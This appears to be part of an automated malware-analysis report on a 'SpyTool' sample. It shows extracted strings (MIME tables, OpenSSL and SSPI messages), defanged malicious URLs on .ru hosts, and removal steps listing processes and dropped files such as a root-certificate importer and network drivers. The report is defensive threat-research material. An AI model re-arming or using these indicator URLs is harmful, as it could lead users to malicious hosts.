.ram=audio/x-pn-realaudio
.rm=audio/x-pn-realaudio
.sd2=audio/x-sd2
.sid=audio/prs.sid
.snd=audio/basic
.wav=audio/x-wav
.wax=audio/x-ms-wax
.wma=audio/x-ms-wma
.mjf=audio/x-vnd.AudioExplosion.MjuiceMediaFile
.art=image/x-jg
.bmp=image/bmp
.cdr=image/x-coreldraw
.cdt=image/x-coreldrawtemplate
.cpt=image/x-corelphotopaint
.djv=image/vnd.djvu
.djvu=image/vnd.djvu
.gif=image/gif
.ief=image/ief
.ico=image/x-icon
.jng=image/x-jng
.jpg=image/jpeg
.jpeg=image/jpeg
.jpe=image/jpeg
.pat=image/x-coreldrawpattern
.pcx=image/pcx
.pbm=image/x-portable-bitmap
.pgm=image/x-portable-graymap
.pict=image/x-pict
.png=image/x-png
.pnm=image/x-portable-anymap
.pntg=image/x-macpaint
.ppm=image/x-portable-pixmap
.psd=image/x-psd
.qtif=image/x-quicktime
.ras=image/x-cmu-raster
.rf=image/vnd.rn-realflash
.rgb=image/x-rgb
.rp=image/vnd.rn-realpix
.sgi=image/x-sgi
.svg=image/svg-xml
.svgz=image/svg-xml
.targa=image/x-targa
.tif=image/x-tiff
.wbmp=image/vnd.wap.wbmp
.webp=image/webp
.xbm=image/xbm
.xbm=image/x-xbitmap
.xpm=image/x-xpixmap
.xwd=image/x-xwindowdump
.xml=text/xml
.uls=text/iuls
.txt=text/plain
.rtx=text/richtext
.wsc=text/scriptlet
.rt=text/vnd.rn-realtext
.htt=text/webviewhtml
.htc=text/x-component
.vcf=text/x-vcard
.asf=video/x-ms-asf
.asx=video/x-ms-asf
.avi=video/x-msvideo
.dl=video/dl
.dv=video/dv
.flc=video/flc
.fli=video/fli
.gl=video/gl
.lsf=video/x-la-asf
.lsx=video/x-la-asf
.mng=video/x-mng
.mp2=video/mpeg
.mp3=video/mpeg
.mp4=video/mpeg
.mpeg=video/x-mpeg2a
.mpa=video/mpeg
.mpe=video/mpeg
.mpg=video/mpeg
.ogv=video/ogg
.moov=video/quicktime
.mov=video/quicktime
.mxu=video/vnd.mpegurl
.qt=video/quicktime
.qtc=video/x-qtc
.rv=video/vnd.rn-realvideo
.ivf=video/x-ivf
.webm=video/webm
.wm=video/x-ms-wm
.wmp=video/x-ms-wmp
.wmv=video/x-ms-wmv
.wmx=video/x-ms-wmx
.wvx=video/x-ms-wvx
.rms=video/vnd.rn-realvideo-secure
.asx=video/x-ms-asf-plugin
.movie=video/x-sgi-movie
.aab=application/x-authorware-bin
.aam=application/x-authorware-map
.aas=application/x-authorware-seg
.abw=application/x-abiword
.ace=application/x-ace-compressed
.ai=application/postscript
.alz=application/x-alz-compressed
.ani=application/x-navi-animation
.arj=application/x-arj
.asf=application/vnd.ms-asf
.bat=application/x-msdos-program
.bcpio=application/x-bcpio
.boz=application/x-bzip2
.bz=application/x-bzip
.bz2=application/x-bzip2
.cab=application/vnd.ms-cab-compressed
.cat=application/vnd.ms-pki.seccat
.ccn=application/x-cnc
.cco=application/x-cocoa
.cdf=application/x-cdf
.cer=application/x-x509-ca-cert
.chm=application/vnd.ms-htmlhelp
.chrt=application/vnd.kde.kchart
.cil=application/vnd.ms-artgalry
.class=application/java-vm
.com=application/x-msdos-program
.clp=application/x-msclip
.cpio=application/x-cpio
.cpt=application/mac-compactpro
.cqk=application/x-calquick
.crd=application/x-mscardfile
.crl=application/pkix-crl
.csh=application/x-csh
.dar=application/x-dar
.dbf=application/x-dbase
.dcr=application/x-director
.deb=application/x-debian-package
.dir=application/x-director
.dist=vnd.apple.installer xml
.distz=vnd.apple.installer xml
.dll=application/x-msdos-program
.dmg=application/x-apple-diskimage
.doc=application/msword
.dot=application/msword
.dvi=application/x-dvi
.dxr=application/x-director
.ebk=application/x-expandedbook
.eps=application/postscript
.evy=application/envoy
.exe=application/x-msdos-program
.fdf=application/vnd.fdf
.fif=application/fractals
.flm=application/vnd.kde.kivio
.fml=application/x-file-mirror-list
.gzip=application/x-gzip
.gnumeric=application/x-gnumeric
.gtar=application/x-gtar
.gz=application/x-gzip
.hdf=application/x-hdf
.hlp=application/winhlp
.hpf=application/x-icq-hpf
.hqx=application/mac-binhex40
.hta=application/hta
.ims=application/vnd.ms-ims
.ins=application/x-internet-signup
.iii=application/x-iphone
.iso=application/x-iso9660-image
.jar=application/java-archive
.karbon=application/vnd.kde.karbon
.kfo=application/vnd.kde.kformula
.kon=application/vnd.kde.kontour
.kpr=application/vnd.kde.kpresenter
.kpt=application/vnd.kde.kpresenter
.kwd=application/vnd.kde.kword
.kwt=application/vnd.kde.kword
.latex=application/x-latex
.lha=application/x-lzh
.lcc=application/fastman
.lrm=application/vnd.ms-lrm
.lz=application/x-lzip
.lzh=application/x-lzh
.lzma=application/x-lzma
.lzo=application/x-lzop
.lzx=application/x-lzx
.mpp=application/vnd.ms-project
.mvb=application/x-msmediaview
.man=application/x-troff-man
.mdb=application/x-msaccess
.me=application/x-troff-me
.ms=application/x-troff-ms
.msi=application/x-msi
.mpkg=vnd.apple.installer xml
.mny=application/x-msmoney
.nix=application/x-mix-transfer
.oda=application/oda
.odb=application/vnd.oasis.opendocument.database
.odc=application/vnd.oasis.opendocument.chart
.odf=application/vnd.oasis.opendocument.formula
.odg=application/vnd.oasis.opendocument.graphics
.odi=application/vnd.oasis.opendocument.image
.odm=application/vnd.oasis.opendocument.text-master
.odp=application/vnd.oasis.opendocument.presentation
.ods=application/vnd.oasis.opendocument.spreadsheet
.ogg=application/ogg
.odt=application/vnd.oasis.opendocument.text
.otg=application/vnd.oasis.opendocument.graphics-template
.oth=application/vnd.oasis.opendocument.text-web
.otp=application/vnd.oasis.opendocument.presentation-template
.ots=application/vnd.oasis.opendocument.spreadsheet-template
.ott=application/vnd.oasis.opendocument.text-template
.p7b=application/x-pkcs7-certificates
.p7r=application/x-pkcs7-certreqresp
.package=application/vnd.autopackage
.pfr=application/font-tdpfr
.pkg=vnd.apple.installer xml
.pdf=application/pdf
.pko=application/vnd.ms-pki.pko
.pl=application/x-perl
.pnq=application/x-icq-pnq
.pot=application/mspowerpoint
.pps=application/mspowerpoint
.ppt=application/mspowerpoint
.ppz=application/mspowerpoint
.ps=application/postscript
.pub=application/x-mspublisher
.qpw=application/x-quattropro
.qtl=application/x-quicktimeplayer
.rar=application/rar
.rdf=application/rdf xml
.rjs=application/vnd.rn-realsystem-rjs
.rm=application/vnd.rn-realmedia
.rmf=application/vnd.rmf
.rmp=application/vnd.rn-rn_music_package
.rmx=application/vnd.rn-realsystem-rmx
.rnx=application/vnd.rn-realplayer
.rpm=application/x-redhat-package-manager
.rsml=application/vnd.rn-rsml
.rtsp=application/x-rtsp
.rss=application/rss xml
.scm=application/x-icq-scm
.ser=application/java-serialized-object
.scd=application/x-msschedule
.sda=application/vnd.stardivision.draw
.sdc=application/vnd.stardivision.calc
.sdd=application/vnd.stardivision.impress
.sdp=application/x-sdp
.setpay=application/set-payment-initiation
.setreg=application/set-registration-initiation
.sh=application/x-sh
.shar=application/x-shar
.shw=application/presentations
.sit=application/x-stuffit
.sitx=application/x-stuffitx
.skd=application/x-koan
.skm=application/x-koan
.skp=application/x-koan
.skt=application/x-koan
.smf=application/vnd.stardivision.math
.smi=application/smil
.smil=application/smil
.spl=application/futuresplash
.ssm=application/streamingmedia
.sst=application/vnd.ms-pki.certstore
.stc=application/vnd.sun.xml.calc.template
.std=application/vnd.sun.xml.draw.template
.sti=application/vnd.sun.xml.impress.template
.stl=application/vnd.ms-pki.stl
.stw=application/vnd.sun.xml.writer.template
.svi=application/softvision
.sv4cpio=application/x-sv4cpio
.sv4crc=application/x-sv4crc
.swf=application/x-shockwave-flash
.swf1=application/x-shockwave-flash
.sxc=application/vnd.sun.xml.calc
.sxi=application/vnd.sun.xml.impress
.sxm=application/vnd.sun.xml.math
.sxw=application/vnd.sun.xml.writer
.sxg=application/vnd.sun.xml.writer.global
.tar=application/x-tar
.tcl=application/x-tcl
.tex=application/x-tex
.texi=application/x-texinfo
.texinfo=application/x-texinfo
.tbz=application/x-bzip-compressed-tar
.tbz2=application/x-bzip-compressed-tar
.tgz=application/x-compressed-tar
.tlz=application/x-lzma-compressed-tar
.tr=application/x-troff
.trm=application/x-msterminal
.troff=application/x-troff
.tsp=application/dsptype
.torrent=application/x-bittorrent
.ttz=application/t-time
.txz=application/x-xz-compressed-tar
.udeb=application/x-debian-package
.uin=application/x-icq
.urls=application/x-url-list
.ustar=application/x-ustar
.vcd=application/x-cdlink
.vor=application/vnd.stardivision.writer
.vsl=application/x-cnet-vsl
.wcm=application/vnd.ms-works
.wb1=application/x-quattropro
.wb2=application/x-quattropro
.wb3=application/x-quattropro
.wdb=application/vnd.ms-works
.wks=application/vnd.ms-works
.wmd=application/x-ms-wmd
.wms=application/x-ms-wms
.wmz=application/x-ms-wmz
.wp5=application/wordperfect5.1
.wpd=application/wordperfect
.wpl=application/vnd.ms-wpl
.wps=application/vnd.ms-works
.wri=application/x-mswrite
.xfdf=application/vnd.adobe.xfdf
.xls=application/x-msexcel
.xlb=application/x-msexcel
.xpi=application/x-xpinstall
.xps=application/vnd.ms-xpsdocument
.xsd=application/vnd.sun.xml.draw
.xul=application/vnd.mozilla.xul xml
.zoo=application/x-zoo
.zip=application/x-zip-compressed
.wml=text/vnd.wap.wml
.wmlc=application/vnd.wap.wmlc
.wmls=text/vnd.wap.wmlscript
.wmlsc=application/vnd.wap.wmlscriptc
.asm=text/x-asm
.pas=text/x-pascal
.cs=text/x-csharp
.cpp=text/x-c  src
.cxx=text/x-c  src
.cc=text/x-c  src
.hpp=text/x-c  hdr
.hxx=text/x-c  hdr
.hh=text/x-c  hdr
.java=text/x-java
.css=text/css
.js=text/javascript
.htm=text/html
.html=text/html
.xhtml=application/xhtml xml
.xht=application/xhtml xml
.ls=text/javascript
.mocha=text/javascript
.shtml=server-parsed-html
.sgm=text/sgml
.sgml=text/sgml
HTTP-EQUIV
()<>@,;:\"./
()<>@,;:\"/[]?=
()<>@,;:\"/[]?={}
X-HTTP-Method-Override
Mozilla/3.0 (compatible; Indy Library)
%d-%d
0.0.0.1
0.0.0.0
HTTPS
https
HTTPONLY=
HTTPONLY
WINDOWS
Content-Disposition: form-data; name="%s"
; filename="%s"
Content-Type: %s
; charset="%s"
Content-Transfer-Encoding: %s
libeay32.dll
ssleay32.dll
libssl32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey
SSL_CTX_use_certificate
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_add_cert
X509_STORE_CTX_get_current_cert
i2d_DSAPrivateKey
d2i_DSAPrivateKey
d2i_PrivateKey
d2i_PrivateKey_bio
DES_set_key
_ossl_old_des_set_key
RSA_generate_key
RSA_check_key
RSA_generate_key_ex
i2d_PrivateKey_bio
i2d_RSAPrivateKey
d2i_RSAPrivateKey
i2d_RSAPublicKey
d2i_RSAPublicKey
i2d_PrivateKey
i2d_NETSCAPE_CERT_SEQUENCE
X509_get_default_cert_file
X509_get_default_cert_file_env
X509_set_pubkey
X509_REQ_set_pubkey
PEM_read_bio_RSAPrivateKey
PEM_read_bio_RSAPublicKey
PEM_read_bio_DSAPrivateKey
PEM_read_bio_PrivateKey
PEM_read_bio_NETSCAPE_CERT_SEQUENCE
PEM_write_bio_RSAPublicKey
PEM_write_bio_DSAPrivateKey
PEM_write_bio_PrivateKey
PEM_write_bio_NETSCAPE_CERT_SEQUENCE
PEM_write_bio_PKCS8PrivateKey
EVP_PKEY_type
EVP_PKEY_new
EVP_PKEY_free
EVP_PKEY_assign
secur32.dll
security.dll
HTTP/1.0 200 OK
HTTP/
%s, ClassID: %s
hXXp://ggileee.ru/tersdssd/see
*.lnk
hXXp://filer.com/zaluper
ji.hjkmjrtgh.ru
hXXp://
/notificate.php?p
C:\cryptserv
ice2\test-result.log
Open SSL Support DLL Delphi and C  Builder interface
hXXp://VVV.indyproject.org/
1993 - 2012
/prod.php?streamId=
.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
DClient policy does not allow credential delegation to target server.bClient policy does not allow credential delegation to target server with NLTM only authentication.1The recipient rejected the renegotiation request.-The required security context does not exist.`The PKU2U protocol encountered an error while attempting to utilize the associated certificates.:The identity of the server computer could not be verified.
Unknown error#SSPI %s returns error #%d(0x%x): %s0SSPI interface has failed to initialise properly
Unknown credentials use!Do AcquireCredentialsHandle first"CompleteAuthToken is not supported
SEC_E_NO_KERB_KEY5The certificate is not valid for the requested usage.
The smartcard certificate used for authentication has been revoked. Please contact your system administrator. There may be additional information in the event log.
An untrusted certificate authority was detected While processing the smartcard certificate used for authentication. Please contact your system administrator.
The revocation status of the smartcard certificate used for authentication could not be determined. Please contact your system administrator.lThe smartcard certificate used for authentication was not trusted. Please contact your system administrator.hThe smartcard certificate used for authentication has expired. Please contact your system administrator.
The Kerberos subsystem encountered an error. A service for user protocol request was made against a domain controller which does not support service for user.
An attempt was made by this server to make a Kerberos constrained delegation request for a target outside of the server's realm. This is not supported, and indicates a misconfiguration on this server's allowed to delegate to list. Please contact your administrator.
The revocation status of the domain controller certificate used for smartcard authentication could not be determined. There is additional information in the system event log. Please contact your system administrator.
An untrusted certificate authority was detected while processing the domain controller certificate used for authentication. There is additional information in the system event log. Please contact your system administrator.
The domain controller certificate used for smartcard logon has expired. Please contact your system administrator with the contents of your system event log.
The domain controller certificate used for smartcard logon has been revoked. Please contact your system administrator with the contents of your system event log.IA signature operation must be performed before the user can authenticate.AOne or more of the parameters passed to the function was invalid.
]The crypto system or checksum function is invalid because a required function is unavailable.9The number of maximum ticket referrals has been exceeded.KThe local machine must be a Kerberos KDC (domain controller) and it is not.qThe other end of the security negotiation is requires strong crypto but it is not supported on the local machine.5The KDC reply contained more than one principal name.OExpected to find PA data for a hint of what etype to use, but it was not found.
The client certificate does not contain a valid UPN, or does not match the client name in the logon request. Please contact your administrator.-Smartcard logon is required and was not used.!A system shutdown is in progress.'An invalid request was sent to the KDC.DThe KDC was unable to generate a referral for the service requested.:The encryption type requested is not supported by the KDC.QAn unsupported preauthentication mechanism was presented to the Kerberos package.
The requested operation cannot be completed. The computer must be trusted for delegation and the current user account must be configured to allow delegation.7Client's supplied SSPI channel bindings were incorrect.9The received certificate was mapped to multiple accounts.4The context data must be renegotiated with the peer.'The target principal name is incorrect.:There is no LSA mode context associated with this context.8The clocks on the client and server machines are skewed.;The certificate chain was issued by an untrusted authority.7The message received was unexpected or badly formatted.;An unknown error occurred while processing the certificate.%The received certificate has expired.*The specified data could not be encrypted.*The specified data could not be decrypted.YThe client and server cannot communicate, because they do not possess a common algorithm.
The security context could not be established due to a failure in the requested quality of service (e.g. mutual authentication or delegation).dA security context was deleted before the context was completed. This is considered a logon failure.mThe client is trying to negotiate a context and the server requires user-to-user but didn't send a TGT reply.aUnable to accomplish the requested task because the local machine does not have any IP addresses.bThe supplied credential handle does not match the credential associated with the security context.
The logon attempt failed;The credentials supplied to the package were not recognized4No credentials are available in the security packageCThe message or signature supplied for verification has been altered8The message supplied for verification is out of sequence3No authority could be contacted for authentication.UThe function completed successfully, but must be called again to complete the contextEThe function completed successfully, but CompleteToken must be calledtThe function completed successfully, but both CompleteToken and this function must be called to complete the contextsThe logon was completed, but no network authority was available. The logon was made using locally known information-The requested security package does not exist2The context has expired and can no longer be used.DThe supplied message is incomplete. The signature was not verified.lThe credentials supplied were not complete, and could not be verified. The context could not be initialized.1The buffers supplied to a function was too small.
The handle specified is invalid'The function requested is not supported.The specified target is unknown or unreachable0The Local Security Authority cannot be contacted-The requested security package does not exist6The caller is not the owner of the desired credentialsBThe security package failed to initialize, and cannot be installed-The token supplied to the function is invalid^The security package is not able to marshall the logon buffer, so the logon attempt has failedNThe per-message Quality of Protection is not supported by the security package?The security context does not allow impersonation of the client
Unsupported operation./Could not encode header data using charset "%s"
SSL status: "%s"
%s Alert
%s Read Alert
%s Write Alert
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
Error getting SSL method.%Error setting File Descriptor for SSL!Error binding data to SSL socket. EOF was observed that violates the protocolpUnsupported object type. You can assign only one of the following types or their descendants: TStrings, TStream.
Unsupported transfer type. You can assign only an empty string or one of the following values: 7bit, 8bit, binary, quoted-printable, base64.OUnsupported encoding. You can assign only one of the following values: Q, B, 8.
Protocol field is empty UDP Not supported by this proxy.$Buffer terminator must be specified.!Buffer start position is invalid.
Reply Code is not valid: %s
Reply Code already exists: %s
IOHandler value is not valid'Algorithm %s not permitted in FIPS mode
Unknown Protocol(Request method requires HTTP version 1.1KUnsupported hash algorithm. This implementation supports only MD5 encoding.$Error accepting connection with SSL.
File "%s" not found
Object type not supported.
Transparent proxy cannot bind.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Command not supported.
Address type not supported."%d: Circular links are not allowed"Not enough data in buffer. (%d/%d)1Only one TIdAntiFreeze can exist per application.&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
Invalid Port Range (%d - %d)
%s is not a valid service.
%s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.
End of stream: Class %s at %d)UDP is not support in this SOCKS version.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Resolving hostname %s.
Connecting to %s.
Socket Error # %d
Operation would block.
Operation now in progress.
Operation already in progress.
Windows Server 2012
Windows 8
Observer is not supportedLCannot have multiple single cast observers added to the observers collection4The object does not implement the observer interfaceGNo single cast observer with ID %d was added to the observer collectionFNo multi cast observer with ID %d was added to the observer collection
Invalid destination array"Character index out of bounds (%d)
Invalid count (%d)
Invalid destination index (%d)
Invalid codepage (%d)4Failed attempting to retrieve time zone information.-Error on call to Winsock2 library function %s&Error on loading Winsock2 library (%s)
Parameter count mismatch<Type '%s' is not declared in the interface section of a unit7VAR and OUT arguments must match parameter type exactly"%s (Version %d.%d, Build %d, %5:s):%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)
Windows
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 2000
Windows XP
Windows Server 2003
Windows Server 2003 R2
Failed to get data for '%s'
%s.Seek not implemented$Operation not allowed on sorted list
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread2Cannot call Start on a running or suspended thread'Parameter %s cannot be a negative value The specified file was not found
Duplicates not allowed5Insufficient RTTI available to support this operation
%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid file name - %s$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream)%s has not been registered as a COM class
Error reading %s%s%s: %s
Start index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %sECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists
External exception %x
Interface not supported
Object lock not owned(Monitor support function not initialized
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported!'%s' is not a valid integer value('%s' is not a valid floating point value '%d.%d' is not a valid timestamp
I/O error %d
Integer overflow Invalid floating point operation

05a00036.exe_284_rwx_00D30000_00001000:

Kernel32.dll
8.iteu

05a00036.exe_284_rwx_0115B000_00001000:

Kernel32.dll
8.iteu


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    AmigoDistrib.exe:580
    UnityWebPlayer.exe:1816
    cd.exe:1568
    cd.exe:1264
    mailruhomesearchvbm.exe:2432
    MailRuUpdater.exe:1632
    MailRuUpdater.exe:916
    MailRuUpdater.exe:1028
    condefsetup (19).exe:348
    amigo.exe:1388
    setup.exe:1932
    verclsid.exe:1568
    mailruhomesearch.exe:1452

  2. Delete the original SpyTool file.
  3. Delete or disinfect the following files created/modified by the SpyTool:

    %Documents and Settings%\%current user%\Local Settings\Temp\CR_2BA30.tmp\CHROME.PACKED.7Z (366388 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CR_2BA30.tmp\SETUP.EX_ (1659 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CR_2BA30.tmp\setup.exe (17080 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\loader\UnityWebPluginAX.ocx (6360 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\loader\npUnity3D32.dll (32784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsh4.tmp\UserInfo.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\loader\info.plist (192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\Uninstall.exe (6078 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr3.tmp (67936 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\UnityWebPlayerUpdate.exe (19592 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsh4.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\UnityBugReporter.exe (25112 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsh4.tmp\UAC.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\loader\UnityWebPlayerNP.map (12536 bytes)
    %Program Files%\Content Defender\cert\SSL\ContentDefender 2.cer (774 bytes)
    %Program Files%\Content Defender\cert\SSL\cert.db (2 bytes)
    %Documents and Settings%\All Users\Favorites\Mail.Ru Агент - используй для общения!.url (210 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\GoMailRu.ico (14076 bytes)
    %Documents and Settings%\All Users\Favorites\Mail.Ru.url (152 bytes)
    %Documents and Settings%\%current user%\Desktop\Искать в Интернете.url (209 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Mail.Ru.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\Sputnik\MailRu.ico (14076 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\Sputnik\Report\3DD21 (792 bytes)
    %System%\GroupPolicy\gpt.ini (180 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Mail.Ru.lnk (1 bytes)
    %Program Files%\Mail.Ru\MailRuUpdater\MailRuUpdater.exe (39945 bytes)
    %Documents and Settings%\%current user%\Application Data\MailProducts\Id (38 bytes)
    %Documents and Settings%\All Users\Application Data\Mail.Ru\Id (38 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe (39945 bytes)
    %System%\GroupPolicy\User\Registry.pol (8 bytes)
    %System%\GroupPolicy\Machine\Registry.pol (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\503031B8-564A-4828-993D-4F6CC32B108C\condefsetup (19).exe (39950 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\AFBFDDD2-8547-49D1-8A41-B824ECBC9A42\05a00036.exe (7972 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\62628F9A-B2BE-4252-8717-CB1BCEA9FE66\mailruhomesearch.exe (30622 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\4B259EC6-7CC5-491E-8AEF-D3E124038DAA\mailruhomesearchvbm.exe (30622 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\65025299-7BA0-4969-BF1C-4323DC267C7A\AmigoDistrib.exe (370096 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\mozcrt19.dll (7581 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nfregdrv.exe (1821 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\win32\condefclean.exe (7716 bytes)
    %Program Files%\Content Defender\nfregdrv.exe (601 bytes)
    %Program Files%\Content Defender\nss\smime3.dll (601 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\certutil.exe (6324 bytes)
    %Program Files%\Content Defender\ssleay32.dll (2105 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\smime3.dll (7716 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_i386.sys (47 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\softokn3.dll (4061 bytes)
    %Program Files%\Content Defender\ContentDefenderPS.dll (13 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\certutil.exe (6324 bytes)
    %Program Files%\Content Defender\libeay32.dll (9098 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nspr4.dll (1821 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderControl.exe (10588 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\import_root_cert.exe (941 bytes)
    %Program Files%\Content Defender\nss\plds4.dll (17 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_amd64.sys (58 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_i386.sys (3516 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\cd.exe (6341 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plds4.dll (17 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\x64\condefclean.exe (7716 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\x64\import_root_cert.exe (6724 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\import_root_cert.exe (941 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plds4.dll (17 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ssleay32.dll (4061 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\ContentDefender.zip (37274 bytes)
    %Program Files%\Content Defender\nss\softokn3.dll (2105 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plds4.dll (580 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\softokn3.dll (25100 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__amd64.sys (61 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\softokn3.dll (25100 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderPS.dll (6116 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plc4.dll (20 bytes)
    %System%\drivers\condef.sys (56 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\condefclean.exe (941 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\condefclean.exe (941 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__i386.sys (4012 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\smime3.dll (7716 bytes)
    %Program Files%\Content Defender\nss\mozcrt19.dll (4545 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderPS.dll (941 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\win32\libeay32.dll (86270 bytes)
    %Program Files%\Content Defender\nss\nspr4.dll (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\libeay32.dll (11493 bytes)
    %Program Files%\Content Defender\import_root_cert.exe (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderControl.exe (1821 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_amd64.sys (4012 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nspr4.dll (11620 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderPS.dll (484 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\win32\nfregdrv.exe (9476 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nspr4.dll (11620 bytes)
